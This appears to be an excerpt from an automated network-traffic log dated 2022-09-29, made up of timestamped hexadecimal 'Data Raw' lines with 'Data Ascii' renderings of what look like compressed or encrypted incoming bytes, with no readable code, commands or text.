                                                                                                                                                2022-09-29 12:49:27 UTC5272INData Raw: 58 d2 ad e4 9c 25 a1 56 4c 6a 01 4e d0 21 f5 18 32 f0 35 eb a3 f3 07 33 4a eb af 63 aa 61 2d 12 33 da f2 19 76 42 e0 4b ee f2 d8 73 2c 2b 5d 91 46 8e 53 ec ad 50 b9 96 45 63 ba 22 7c 0f c8 df 65 98 4f 22 de 59 88 85 74 9b 7a b7 eb f8 f1 ab d7 5d bc 41 62 17 85 92 d4 e2 ae c1 09 e4 9a 5f 45 ef 5e 68 2a db 97 49 0d 5c dc c3 ac 63 2c 96 3d 0f 52 70 61 49 c6 bf 58 8c e4 4a ff 6f c0 ec b9 dd 9c c3 db 32 0e 3b 86 b6 82 92 f6 c0 70 b3 96 47 47 49 a8 5b 18 70 08 24 75 de 17 e1 f5 a8 db 0f 4b 51 b8 0e 2d bd 4e c9 92 c2 6a 67 be d2 62 f4 bc ed 71 3d 44 63 fd c4 8a 0a bf b1 72 87 f6 68 43 35 52 52 ef 0f d9 ea 5c 91 4e 4b 3b 36 59 aa cf 64 60 af a2 13 01 05 c6 eb d0 0c 5d af 6f 21 76 63 68 eb c3 94 bb 78 12 9a 4e 05 db 09 06 ae 4a 43 4a 3d 0c 5f f4 33 4b b0 f9 a2 f9
                                                                                                                                                Data Ascii: X%VLjN!253Jca-3vBKs,+]FSPEc"|eO"Ytz]Ab_E^h*I\c,=RpaIXJo2;pGGI[p$uKQ-Njgbq=DcrhC5RR\NK;6Yd`]o!vchxNJCJ=_3K
                                                                                                                                                2022-09-29 12:49:27 UTC5288INData Raw: c0 b3 92 47 3b 0c 11 5c 94 ab 35 f2 09 d8 2d 7e 0b 01 31 6e e3 c7 6b c0 d9 dc e3 23 74 4e ed d9 75 76 d1 c5 40 e2 c3 1d e9 01 4a dd e3 64 f4 85 18 6c e9 61 40 72 8f 75 e2 40 bf cf 25 60 4c 32 b2 79 e8 c1 a0 88 2d 79 57 1d 23 a3 54 cb 9a 46 08 73 48 5c 10 4d df b5 87 ec 62 fc b9 a3 3c 27 a7 99 11 22 99 35 73 b1 88 7c 1c 9a 2e e2 b0 f0 c9 a5 15 09 85 5c cc ca 03 e0 12 a4 dc ca 22 7d 28 86 45 b3 1c 4a 62 34 32 a8 9a a3 35 6a 3a 55 32 ff de d1 3b e9 a6 91 06 4a 2b dd 89 60 c4 12 7e c1 4c b4 8f 98 91 47 cf 49 eb 54 8a ad 0e b4 ff 44 46 65 07 e0 b0 6b 0c d1 87 74 0c 75 c8 b1 e4 f7 f8 11 14 9f af 0d 5e 21 a3 a6 b6 fc 24 fe 9b 63 0f fd 3e de ce 1b d3 e1 20 e2 5b 9c 51 38 86 a2 00 e8 85 22 f1 c3 70 f9 51 da 24 b5 39 90 f7 f6 71 2b 6f e4 75 84 67 fe c3 f4 f2 22 55
                                                                                                                                                Data Ascii: G;\5-~1nk#tNuv@Jdla@ru@%`L2y-yW#TFsH\Mb<'"5s|.\"}(EJb425j:U2;J+`~LGITDFektu^!$c> [Q8"pQ$9q+oug"U
                                                                                                                                                2022-09-29 12:49:27 UTC5304INData Raw: 00 1a b3 29 61 65 0f 41 ac 5b ed 46 de f4 8c 05 a0 ff ba e8 90 e3 61 07 91 1f 51 a6 ed 96 86 e5 9c 5e a4 e7 39 2b a0 5f f9 bc fc 91 22 ec 39 9e 69 f9 8f 5f 1f 6e 29 fc a1 60 5d 2a fa 2d c5 34 72 42 f2 d8 3c 6e 4e eb a0 02 f3 fc ca 3b c1 8e a9 41 85 87 8c ae 5d d8 ab 59 4d 84 ac 52 d8 c9 0d 12 78 23 1b 1b 23 e1 e8 73 d9 47 da d4 14 74 ef 95 10 71 5c a3 8c 23 ed 3e 49 b0 82 04 e4 53 97 9e 7b 55 d3 89 17 49 3d e6 d9 7a fb a4 b3 1b 3e e1 e3 48 eb 92 e4 ca 58 56 63 58 58 ce 33 bd d1 01 7b 6d 42 15 0a ab 2a 9c b5 db 20 0c b9 b5 f7 26 11 5f 2b 19 28 49 0b 97 a5 31 58 22 ba ce 88 a9 19 43 11 6b 5a 25 40 ed 58 12 81 00 ca fa 0e 46 27 30 2d af aa cf 33 24 6f 80 3b 4c 6a 83 49 d0 c4 2f f5 0c b6 39 86 50 a6 e3 53 92 fe 83 9a 80 50 be f8 36 5f 48 a2 25 6f b5 e4 ec dd
                                                                                                                                                Data Ascii: )aeA[FaQ^9+_"9i_n)`]*-4rB<nN;A]YMRx##sGtq\#>IS{UI=z>HXVcXX3{mB* &_+(I1X"CkZ%@XF'0-3$o;LjI/9PSP6_H%o
                                                                                                                                                2022-09-29 12:49:27 UTC5320INData Raw: 75 71 78 d3 b1 6e 34 60 d3 7e 08 c6 5b 94 dc cf 56 f7 57 fb d2 8c 78 f6 3c 0f c1 2d a4 ab 32 1d 87 64 37 f6 f3 4d 1b 95 df 9e 03 bd 75 1a 8d f0 b2 65 76 d0 41 ed d1 e0 57 30 15 3c ea 8c 44 55 08 e1 2f c0 44 cb 3e 30 85 b9 a9 96 1f 8f ab d1 4e bf dc 8b 47 1e 06 c5 d2 27 18 fd 74 5b fb 09 b2 af 3b 84 63 c3 cc b1 93 c0 ee 8c bc c7 26 5a 5f 59 fe cc f2 8c 8c aa 71 22 19 83 0d 53 a9 0a cb f6 0b c8 64 bb b1 af f6 a0 a7 c7 c0 5c 0d e2 27 63 28 19 1d cb 68 78 61 84 3e c8 91 6a e3 38 8f a1 df ff 4f a6 dc e9 8a 6f ce 84 f8 ae 4b 76 be 88 30 16 86 d4 9a a4 a7 5a b3 30 be 38 44 41 51 a6 d9 8f 63 d6 d5 d3 3d bb 84 b6 99 d8 17 7a cd 80 d2 f7 4a a3 44 72 ab d6 fb dd 8f b1 56 0a e7 22 d2 d9 93 7d ad 66 75 23 7a 0a 4c 26 25 41 20 3a d5 2f c0 ce 6c 88 f3 0b 99 35 4e 5f c9
                                                                                                                                                Data Ascii: uqxn4`~[VWx<-2d7MuevAW0<DU/D>0NG't[;c&Z_Yq"Sd\'c(hxa>j8OoKv0Z08DAQc=zJDrV"}fu#zL&%A :/l5N_
                                                                                                                                                2022-09-29 12:49:27 UTC5336INData Raw: 02 51 8f 8f d8 29 53 2e bd 28 42 70 4c 31 07 42 0d 85 9d 35 8e a0 68 52 27 63 8a 97 fb 26 05 29 29 13 ef 7a ea 94 40 eb d2 d1 07 60 21 b3 13 b8 87 05 94 9e 32 fe 32 d3 fb 29 da f7 1b c2 45 e6 cf d4 c3 7d ea ac 99 85 03 50 a8 88 81 e0 9f ae 82 55 04 bf b2 50 2b e2 d4 94 ee 9f 24 36 87 29 32 d1 e1 14 46 fa e0 4f c4 9a 11 8c ae 2f 62 68 d2 a1 f6 a7 7f da 50 d6 a5 87 f6 61 3d 09 6b 8b 76 17 ab d8 6d c3 b3 65 d8 55 dd 7e e7 60 43 98 39 4a 6a 1e 09 c5 b9 57 11 95 74 da 35 6f e8 9b 77 08 33 84 a2 13 f3 4e 25 62 a7 b3 e6 8d 1b 82 6b 56 71 13 ad 80 d2 a8 0e 90 31 4d a6 e2 72 52 9a 7d 12 af 29 14 39 bf 65 0a 48 9f e2 ee cb f5 a7 6d 62 ef 46 d0 fc df e1 1c d6 d7 46 de 42 33 bc c4 a8 ab 65 8a 9f e7 94 ef 07 4f fb 4c 3a e9 db 4d 8d 0b 51 2c 4c 2d fb 20 65 cf 1c d2 ed
                                                                                                                                                Data Ascii: Q)S.(BpL1B5hR'c&))z@`!22)E}PUP+$6)2FO/bhPa=kvmeU~`C9JjWt5ow3N%bkVq1MrR})9eHmbFFB3eOL:MQ,L- e
                                                                                                                                                2022-09-29 12:49:27 UTC5352INData Raw: 39 0a c5 95 63 c1 f6 00 e3 c8 de 4e 6a eb 96 df 16 62 7b 2f 7f f9 14 2c 48 b9 28 84 89 6c d4 eb a3 9d fa 6c d0 8a ee a3 4c 01 f7 28 10 ad 0a 3f 00 b5 d3 21 3a 64 79 8d 81 78 17 0f e5 a9 58 3a 5f 88 7b a5 32 ec 8c c7 a6 b6 9e 16 4b 05 81 03 26 f9 2c 52 c9 16 f7 f3 85 e7 b1 42 1b 31 e1 b3 82 2b 4f 5a bf af a2 28 2a 1f 9a 6e 64 a0 7c e8 e6 7f 64 46 cb 2a bd 6e 71 d8 c8 b3 d3 96 a0 53 b1 47 32 d1 cd 3e 8d 06 ae c0 1c a3 81 d4 86 23 19 af 5f e4 cf db aa 25 43 d9 2d 97 5a bb e9 e2 9f 24 48 a1 cb f6 08 23 c2 7b 27 fc 6b a5 03 31 e8 6a c6 ce 59 19 07 43 77 a5 3f 8f 81 c4 d5 bd 7e 49 7c 77 55 54 50 2b 1a 86 fd 18 8f f6 03 87 de b8 4d 35 4c f7 a8 9a 34 52 ec bc 22 dd c1 d7 96 36 10 27 e6 a3 85 86 1f 3c 94 7b 27 c9 67 fb 70 67 64 c0 d2 82 86 04 d6 eb e2 e7 5e 77 2a
                                                                                                                                                Data Ascii: 9cNjb{/,H(llL(?!:dyxX:_{2K&,RB1+OZ(*nd|dF*nqSG2>#_%C-Z$H#{'k1jYCw?~I|wUTP+M5L4R"6'<{'gpgd^w*
                                                                                                                                                2022-09-29 12:49:27 UTC5368INData Raw: 94 c6 87 dd c8 c6 be 9c 75 1b ec af 2d f9 b3 2b 70 67 fd 9c 6e 0d 8b 39 5e f2 fe a6 e2 2a 9c 93 95 62 99 fe 87 c8 df dc 49 c6 91 14 c0 f7 e8 fc e9 a5 cd c2 46 1e 2f 96 73 5c 21 ac 15 fd 2f 8f 2e 1a c9 7d 78 7c 43 d6 b2 20 da aa c3 03 95 60 71 70 e9 ba c8 34 0a 58 a9 2c e0 0d 4d db b0 85 22 ad 8f 07 ce 62 a5 a1 7e 80 fe 99 00 9f 07 a4 cb bc d8 20 e8 2a 3c b7 4f 3d 5d cb c7 53 e6 23 57 45 7f 60 a3 9f 8b 56 64 12 22 ad 2e 54 b9 04 65 da 86 67 b5 03 e1 d3 f5 a5 c1 e8 1f 38 49 16 76 70 5d a1 5b 89 55 2d 79 44 de 63 90 3c d0 42 a0 97 22 c8 26 89 d2 30 c9 96 81 f3 ea 92 d1 17 d3 d6 6f 4f e6 8b fc fc e0 d5 b2 51 3d 25 dc 59 6a 84 12 b2 dd 02 02 e6 63 62 ee f0 4a a6 c1 a7 17 57 16 d4 be ce 47 02 ab 06 ea e1 a8 5d 1c c2 13 c7 1c 15 dc f8 d8 f8 91 83 9c 7d ff 7a 0c
                                                                                                                                                Data Ascii: u-+pgn9^*bIF/s\!/.}x|C `qp4X,M"b~ *<O=]S#WE`Vd".Teg8Ivp][U-yDc<B"&0oOQ=%YjcbJWG]}z
                                                                                                                                                2022-09-29 12:49:27 UTC5384INData Raw: b2 20 12 c7 ad 5f 39 30 90 62 f3 33 34 77 54 92 a2 33 f6 14 21 de 12 c6 bf 02 d0 03 93 53 72 39 41 bb 55 78 e0 bd fd b4 ca d2 47 26 cb c8 1f e3 b2 63 0f 17 27 e2 de c9 1e 1f f1 b3 43 79 7d d2 9f f0 ee 21 ae 0f 95 47 e4 97 14 a1 a2 8e 30 2a f0 ce 07 74 7b c7 ae 12 f4 4c 53 f7 c0 07 d2 72 16 dd d1 b4 20 19 5d d8 90 51 64 f7 ba 16 d1 a8 3d 62 c5 36 3d cd 9f 33 ca f8 70 ca a0 a0 93 05 2c 53 79 2c e0 2e 42 69 d5 46 b7 21 ae 10 f8 6a 2e 74 2b 7e cf b8 5d 0f b5 98 b4 8c 4a f2 8e 66 f5 ac 5a 31 b0 87 76 6c 8c 75 23 f1 0e 42 d8 01 38 39 95 a2 52 6f 3d 9c 57 63 32 b4 3a dc ff 18 51 ba 19 0b c6 08 a6 09 86 75 4d d6 e8 4e 60 c9 6d e1 b2 53 5c 27 0f a5 2e 8d 1a 56 48 84 c7 7a 69 8d 0b 56 67 b3 4b 5e 85 c0 a5 92 8c db 68 95 68 ed 82 2a cc 07 b1 72 9f 93 b3 2f e7 5b 0f
                                                                                                                                                Data Ascii: _90b34wT3!Sr9AUxG&c'Cy}!G0*t{LSr ]Qd=b6=3p,Sy,.BiF!j.t+~]JfZ1vlu#B89Ro=Wc2:QuMN`mS\'.VHziVgK^hh*r/[
                                                                                                                                                2022-09-29 12:49:27 UTC5400INData Raw: 3b f8 58 2e 70 d9 26 d8 2d 94 07 e3 60 b2 74 8d 55 f6 1c 90 42 41 13 d5 d9 4a a7 ff 62 e0 ee 6b a4 b4 94 6a 0b 74 89 3e 56 40 e0 bb 7e 86 f6 31 d5 b5 83 49 5a 25 80 99 d9 12 79 29 f6 7f 82 72 1c 41 6a 3c d3 40 52 82 42 ac 2b d0 8e a8 67 f8 b3 4f 3b 42 15 8f 25 ec c2 34 0d 4f 1a 4d ac 72 3a 2b 7d 8e 5d fe 28 f4 dd 74 75 d3 28 a3 3e 43 c7 b1 a6 18 bf 7e 76 af 7e 58 67 da db 75 97 3b ec 4b f7 04 1b aa 00 55 82 c6 12 c8 78 a9 26 85 43 6b 11 00 b6 25 21 70 83 91 c3 5a 6b 45 31 e2 ad 9a 99 00 70 2e 97 8f fd 68 e9 0d 95 ac c3 8d 19 dd e8 e4 7b 93 84 19 5f 7f ab 25 25 99 de f8 df f0 e2 ec 21 c9 47 69 30 8b fe 58 ac e4 09 f6 7a 5c 8d 34 96 d1 81 1b e9 6a bf b0 4b cc 75 9a 79 7c cf 09 2f 86 e0 bf fc cb 9e 15 b7 99 d2 b3 71 2e ff 31 f7 95 72 ed ef 98 46 3c b9 59 13
                                                                                                                                                Data Ascii: ;X.p&-`tUBAJbkjt>V@~1IZ%y)rAj<@RB+gO;B%4OMr:+}](tu(>C~v~Xgu;KUx&Ck%!pZkE1p.h{_%%!Gi0Xz\4jKuy|/q.1rF<Y
                                                                                                                                                2022-09-29 12:49:27 UTC5416INData Raw: fa 63 63 49 78 04 51 92 38 91 9a f1 f3 ca e4 9e b3 8f e6 2b e2 25 e0 26 87 b6 e3 30 3b 81 2e 95 2d 1f b9 02 47 ea 85 4d f2 fb 6f b5 95 2d 30 a8 b8 a7 b4 90 8c 69 9d 09 ba 10 9f d6 e2 43 7f 1b a4 08 1b df bd 3c 7f e7 7a 48 12 c6 4a 7e 6e fd 2b cb ca 46 f6 fb 20 c4 8a c4 cf a7 46 55 dd 11 5e 86 fd 9a 60 db 14 e6 3c e9 e8 30 e1 0e 08 72 77 1c f8 18 ab cb 27 4c 9b a2 a0 18 0a 27 42 da bc bb e4 bd a9 5d f4 0e 31 f2 80 c1 f2 8b 20 5e 53 82 c2 62 9f 21 fe 47 12 47 b0 3d 71 40 00 e0 a0 b1 e4 bb 24 a8 ad 45 45 36 2e fe 78 83 97 b8 42 ff 9f 7e b9 f2 0e 9e 76 46 a7 1b 6d 14 9b 10 5f 6d e0 84 81 47 4f a6 fe 28 6b f2 3e 5a 71 70 03 57 f3 d5 d3 51 6a 49 ed 76 43 a7 67 3b 70 82 1b f6 7f 8b 11 1d ca b7 e7 54 4e c9 9d 60 af 29 69 9e 33 6e da f5 85 5d 76 1f 57 c2 f6 33 da
                                                                                                                                                Data Ascii: ccIxQ8+%&0;.-GMo-0iC<zHJ~n+F FU^`<0rw'L'B]1 ^Sb!GG=q@$EE6.xB~vFm_mGO(k>ZqpWQjIvCg;pTN`)i3n]vW3
                                                                                                                                                2022-09-29 12:49:27 UTC5432INData Raw: 9d ad 4d fa 37 7a 0e c7 f2 00 b3 40 17 a3 9c d9 5e 22 89 2e 8b 49 80 75 55 da 8d 1d fb 3b c6 2e 6f 78 48 62 b0 af f5 6d da ec a0 d5 2d 47 41 c0 67 b6 10 68 91 7d bc b2 37 07 38 09 fc 7d 97 8a 9e c1 5a 48 ad e4 4a 8e 02 f7 2a 7d f7 66 af b7 38 9d 5b a6 62 5f 9d c5 e4 03 f6 9e 8f d8 b5 9b 00 cb a4 0b 43 44 6b fa fe 38 ee 36 53 99 e2 5c 88 ee b1 34 58 16 9f bc 3a 78 70 01 15 7e 18 32 eb 5e b0 b5 ac 8e df 21 be 50 33 4f 3b 48 e4 59 61 89 1e 7f 6a 66 b3 0a 93 b5 81 28 c7 f8 67 03 8e 89 19 32 f2 be be 12 ce 3a 51 6e 99 f5 11 0a 0c 03 26 fb 96 31 67 45 07 d8 af f6 11 57 fc 03 36 85 fe 87 bd 0e 57 4c 45 0a 0b 48 c4 3e 3e c1 72 ac 29 54 b6 68 33 ad 16 78 cd 57 ee 0b 7c 85 ef d8 f2 a1 5b 18 5e f2 05 35 20 c0 d2 0b 79 fd 54 a4 ff 03 71 c7 af 3e 86 8c 77 2f 43 74 3c
                                                                                                                                                Data Ascii: M7z@^".IuU;.oxHbm-GAgh}78}ZHJ*}f8[b_CDk86S\4X:xp~2^!P3O;HYajf(g2:Qn&1gEW6WLEH>>r)Th3xW|[^5 yTq>w/Ct<
                                                                                                                                                2022-09-29 12:49:27 UTC5448INData Raw: a5 71 31 af 64 a8 a7 54 41 80 05 ec 5e 29 56 ae 62 97 56 a0 89 9b 9e af d8 37 30 a5 12 96 c0 d0 ca e2 27 3d 45 4c a9 9c ca 9f ac 27 b6 a6 7b f3 cd 52 de 3b bf 69 e2 c3 62 bc 7c d7 00 cb 6c cd 4f 96 4b 70 7d 26 11 47 74 4a a2 b3 f4 60 75 5e 5a ae cb 3d 3b 29 24 d6 28 52 4f da d5 20 e6 5b ee 22 f6 51 82 c6 dd 05 44 2d f5 74 f5 3b e6 0e ab 3c 68 9a 5b 88 d5 f8 89 81 73 c0 db 81 21 aa 89 8a 68 bf 0e 84 17 60 9a 8f dc e3 c4 b0 5c 02 89 52 c7 00 ab 31 a9 10 37 9a 3d ef 0f 57 2f 42 2b 37 bd ea 6c fe c7 7e 32 e9 e1 b5 b6 0c 71 9f 94 8d 92 72 5d 86 2e 23 41 89 0e bd d1 d3 78 1d 84 3b 1d 2d d0 71 90 55 42 45 de 12 7c 03 f1 5a 67 a6 06 57 28 26 e4 6e 01 51 fb e0 33 7d 97 bd 8a 59 30 90 76 4d 80 cd 1e 24 c1 49 28 1b 51 db a3 66 db 3e 9b d3 ec 0a 6e ac cd da 56 48 cb
                                                                                                                                                Data Ascii: q1dTA^)VbV70'=EL'{R;ib|lOKp}&GtJ`u^Z=;)$(RO ["QD-t;<h[s!h`\R17=W/B+7l~2qr].#Ax;-qUBE|ZgW(&nQ3}Y0vM$I(Qf>nVH
                                                                                                                                                2022-09-29 12:49:27 UTC5464INData Raw: b5 71 18 5c b5 dd 9a 38 68 3c b2 fa 5e cd 36 13 e5 09 76 91 5c a9 22 12 17 d2 bc c3 06 50 9c 24 a7 55 d0 46 8e 5c ad c6 44 09 e1 ec 7e 7e 96 83 3c 9d ab 73 ea e8 30 de e7 70 1d 97 0a ac 98 ef 4d 2f 0d cf d4 f9 b6 ba f2 d7 88 e1 d2 e6 31 03 67 fe fa f5 da fb d6 c0 c2 f2 24 25 06 4f 32 79 0c e6 97 e7 11 91 dc ec e4 f6 96 74 6a d1 5f 5c 1d 2f 10 ab ef 89 29 d1 58 c2 0b 06 2e 2f 2d 4c 11 55 ca 08 12 a4 f7 57 99 b5 bb b4 bd bb 96 d9 01 06 e7 df 84 dc 1e 6c 78 00 77 f7 f0 f8 f7 f6 77 8b d7 df 27 cc 55 68 f4 30 be bf 52 e9 fc ff e7 1d 66 2e 37 3b e6 a4 81 e6 00 f1 c4 63 b2 28 4b 37 d3 ef 58 65 e2 2a 68 52 bd 3b ab 7c 8e 24 0e 3e 50 7e 8c d9 22 2e 6b f6 e4 30 50 42 03 76 05 ba 74 b0 74 c2 42 e1 5b 30 6c 29 f0 57 08 dd 3a d8 0a b9 96 ec cf e5 23 f3 23 05 68 e5 58
                                                                                                                                                Data Ascii: q\8h<^6v\"P$UF\D~~<s0pM/1g$%O2ytj_\/)X./-LUWlxww'Uh0Rf.7;c(K7Xe*hR;|$>P~".k0PBvttB[0l)W:##hX
                                                                                                                                                2022-09-29 12:49:27 UTC5480INData Raw: 7c 2e 0f f0 ff 74 be 6a 9f 39 cc 65 8b 13 4e b5 49 36 9f 4a c7 1c 79 96 85 1d 58 fb af 1d 6e 37 52 db c5 ad 0d 95 fb 42 38 38 b1 20 82 0f 5e 7c e4 6c aa 48 b5 35 c4 91 df 45 18 1d 5e 2e 1d 71 46 14 51 0f 38 c3 bd 1c 61 24 e6 d6 c2 d9 8b ec 45 cb e3 1e 43 fe 6c dc 7f d0 9d 3b 06 b5 f1 5b 22 56 16 14 8b 87 30 74 f6 3a 5b c8 7c 72 bc 68 a4 08 3b fe 0f 7e 34 1c de 14 14 34 b4 3b e1 95 a6 6b 89 0a 5b 29 75 4e 88 75 9c c2 20 37 0a b4 28 13 87 c0 ea bc 90 78 9e 20 f9 4b 71 08 c5 4b 31 fe 4f 8c a9 f9 e1 95 f4 6b d3 a6 55 a9 6e 79 b4 7b 3e 5d 98 5f 46 c9 c8 01 e7 0a a8 d7 e2 4e 1b 1e 2d 5e 36 ed f8 fa 31 8f fc 28 19 81 0a 00 a4 5c ec e6 78 f6 65 02 6c 64 ff 50 48 e6 79 ad 7d 76 08 b2 2b 64 61 49 8e e2 d9 1f 1e 25 aa ab 7c c1 d6 f3 ce b9 82 da 2b e7 50 31 ee 1d 70
                                                                                                                                                Data Ascii: |.tj9eNI6JyXn7RB88 ^|lH5E^.qFQ8a$ECl;["V0t:[|rh;~44;k[)uNu 7(x KqK1OkUny{>]_FN-^61(\xeldPHy}v+daI%|+P1p
                                                                                                                                                2022-09-29 12:49:27 UTC5496INData Raw: ff 57 20 2f b6 75 34 8a 99 27 99 18 a9 c6 03 09 18 7d d1 ef d2 e5 22 63 de a4 d1 9c b3 a1 26 47 f0 17 a3 34 fa 48 9f 5c 51 b9 22 d5 12 90 c3 b0 ce 7e 9c 8b 1e 0d aa c4 5e 99 6e d6 96 e1 10 65 7e 86 8f 62 9f 34 f9 cc a8 ce d8 2c 44 68 e4 34 39 ea 5e 06 44 ce 1a a0 16 c5 74 9c 27 2a 2f 1e a5 18 f8 ca 94 44 c2 f7 58 e9 11 55 cc ef 99 99 b6 c0 eb 82 e3 1a 89 60 cf 1f d4 ee 12 c9 94 39 2a e9 92 49 24 13 d0 d9 64 0d 0a 40 ea 90 86 18 33 18 97 5c b8 c5 d9 1f 29 b4 88 2f 31 67 13 a3 86 44 97 f4 16 58 21 c3 59 ca 0b 68 b6 09 87 48 82 a7 61 39 50 fc 58 dd 60 b2 84 a1 f3 ee 1a 12 82 7f 7a 36 eb 0d ce 12 74 ce 8f 94 f9 9c 2a b6 22 7b 90 f4 ee 3e bb dd 97 ad 46 ee 96 1d e5 b6 39 54 91 90 6e 23 77 c8 54 c9 9c dd e4 d6 7f 4c 54 81 e1 b9 da 38 43 3e 18 4b c0 0e a8 55 b1
                                                                                                                                                Data Ascii: W /u4'}"c&G4H\Q"~^ne~b4,Dh49^Dt'*/DXU`9*I$d@3\)/1gDX!YhHa9PX`z6t*"{>F9Tn#wTLT8C>KU
                                                                                                                                                2022-09-29 12:49:27 UTC5512INData Raw: 2c 34 45 6e bf 91 85 ce 02 2f e8 bf 14 a5 8b 54 47 9f ef c4 ba 80 4e c1 42 56 4d 2c a3 38 86 08 6d 8b a4 31 a0 d9 e3 ee b9 36 9a 25 76 cf fc 13 93 ae 40 76 1d 0f 33 ce 8a 30 70 13 c4 b7 ee 14 3e fe 48 a8 d0 ee 86 ab 30 89 a9 d7 29 6e c5 6b ce 19 87 ec 01 b8 f3 19 7f 52 ce 05 20 11 dc a4 21 0b 62 bf 02 93 f2 95 86 3f e9 42 32 ca 05 9e 5c 13 4b 4f 7e b0 9f 8c 0d aa a0 31 05 ef 4c 1c ba 42 a2 ac 27 82 60 6c 9c 41 c0 92 7c 42 9f 30 4f 87 08 f2 fd 45 98 48 94 8a 99 b7 56 f1 d0 8c 57 04 79 00 36 d9 b4 d4 4a 0b ce db 55 04 c3 ec df de ca e2 23 df db b6 ac b5 73 74 7a 95 35 a6 03 6c 5c 8a ba 7b 49 ba 61 ab 06 51 f8 01 3b e0 b9 1d 62 60 13 33 63 af 72 2e f0 06 cf e6 f5 8c 0f 09 eb 39 95 4c 6a cd 2e ba 7d 1a 2e 3d e4 2c 83 85 ff c8 dd 23 33 e8 e5 6a 49 81 fc 6b ca
                                                                                                                                                Data Ascii: ,4En/TGNBVM,8m16%v@v30p>H0)nkR !b?B2\KO~1LB'`lA|B0OEHVWy6JU#stz5l\{IaQ;b`3cr.9Lj.}.=,#3jIk
                                                                                                                                                2022-09-29 12:49:27 UTC5517INData Raw: 93 f9 d2 46 48 d5 fe 55 b6 2a a5 c6 1d 5d b3 7f 8d aa 2a d3 5f 28 e8 ef c2 83 f3 ce a0 b6 88 0e da e7 be 48 35 ed fa 2c aa b0 cb d5 5e 34 06 d4 90 b7 eb a7 df d4 07 1c ba 8d 49 b9 5f 36 dc 88 ee 9d 88 2a 19 87 62 da 88 83 55 50 72 50 57 f8 a9 65 ba c2 f1 0c 1e 1d 8e 6b 82 08 c2 24 7e ae 2f d8 c7 1a af 29 12 3c aa 2e 1c b3 38 34 b8 2f d7 5b 19 06 d3 3e 51 b0 1d 8f 19 df b2 98 82 bc ea e7 fa a6 e6 f3 25 9a ec ee 14 69 02 58 4d da e2 83 c0 49 71 40 96 78 33 e3 dc 0e ac 67 2a 8e d4 1d 89 b5 2f 0e 79 ff 15 eb ec 5d 55 ef 80 b6 00 ad c8 31 1c 90 7d 4b 6e 19 c7 d4 ed 62 2c 8b 0c 67 81 eb 81 fa 15 36 af 5c f2 2a 93 16 b7 c0 0f a4 6d ea 55 73 63 bf e9 9b 94 99 54 99 dc b8 75 2c 7e 74 f0 db 79 39 9d b1 06 30 cb ce 7b b9 20 d6 75 18 31 7c 33 7a 60 f8 44 ce f4 78 dc
                                                                                                                                                Data Ascii: FHU*]*_(H5,^4I_6*bUPrPWek$~/)<.84/[>Q%iXMIq@x3g*/y]U1}Knb,g6\*mUscTu,~ty90{ u1|3z`Dx
                                                                                                                                                2022-09-29 12:49:27 UTC5533INData Raw: 9a 84 e5 dd 4a cf a0 f9 11 03 9d 55 1a 8b 99 7a fe c8 3e 76 79 2a f9 08 4e b4 52 a1 14 11 33 34 dc be 1b ea bb 88 79 e7 cf 2c 64 22 81 28 ff 6c a9 66 6b bf ea c2 e5 7e 49 c7 db 26 24 34 35 1e 05 0c 6f 5c f2 7a c8 c1 8b 64 27 cb 01 ff 33 e7 fd cc c6 17 27 48 ef 02 ae 4c 99 2d 18 df 4e a7 aa 74 24 6a f4 a4 03 bf d6 5a 5e 16 24 12 73 8f b5 e5 8e 4a 9d a3 b8 42 8f 33 be 7b 10 a5 5f 41 f2 fd d9 fc 45 0d 85 92 3c cf 6e b3 32 18 42 1e cf d0 1f c8 f9 92 cd 96 fa 8c 5b 93 a4 54 70 df ed d6 23 29 6a fe 75 19 9e 49 85 23 b7 a2 26 43 18 50 4c ba 46 c4 79 52 58 08 67 0a 07 8a c8 9d 4e 91 a1 a0 c8 6b 20 78 5c 23 7f 00 06 96 af 3c 16 82 70 b0 90 82 97 a5 99 cf 00 e1 46 f3 99 fe 40 02 31 ca c5 a0 96 76 7e 2e d8 87 b8 60 bf ca 61 5b 39 99 46 8c 19 f8 ce 8b 93 1b 6d 66 08
                                                                                                                                                Data Ascii: JUz>vy*NR34y,d"(lfk~I&$45o\zd'3'HL-Nt$jZ^$sJB3{_AE<n2B[Tp#)juI#&CPLFyRXgNk x\#<pF@1v~.`a[9Fmf
                                                                                                                                                2022-09-29 12:49:27 UTC5549INData Raw: 1c 00 36 b2 e3 6b 7c 07 4b 47 79 9a 46 a5 92 5b d4 d1 3c b5 c0 bb 06 00 fb cf 09 81 09 19 d9 2c e2 f8 8d a7 e2 54 59 fd ac c0 a7 b5 66 a9 ed 23 b6 5c 22 31 d2 9a 17 4f d5 db b0 e4 66 2e 67 a7 74 94 e5 b2 2c d4 8c de 6f c8 d1 59 73 4f 02 a7 20 3d 0b 5c 97 84 32 b9 4d e7 3d b1 29 68 73 b6 1d 89 78 db 69 4f ec d2 77 b5 e7 a8 32 72 03 22 08 0c 15 cd f4 f0 3e 96 14 2b 47 fb 82 bf cc 8d 70 ad f4 00 9c 78 80 b4 40 d9 6a 71 e7 ef 0a 68 57 0b c1 fa 15 5f 7c 4a 22 cc 21 8f bf 77 11 8f 4e 1a f7 a4 91 b2 eb 75 e8 21 64 a2 d0 90 ef 14 d6 a4 9f 1d fa c8 60 cc 1e 51 a7 03 58 22 33 4c b0 b9 bd a4 89 b0 b2 5b 60 82 0a 99 8d b9 19 07 d9 0c 2c c7 50 a5 60 34 47 34 38 63 93 da 1f fd 83 e4 1f 84 28 d8 fd 17 9c 0d 06 f7 23 5d 07 9a 06 f3 30 6e 13 06 4f f9 37 1f 68 e5 04 6c 27
                                                                                                                                                Data Ascii: 6k|KGyF[<,TYf#\"1Of.gt,oYsO =\2M=)hsxiOw2r">+Gpx@jqhW_|J"!wNu!d`QX"3L[`,P`4G48c(#]0nO7hl'
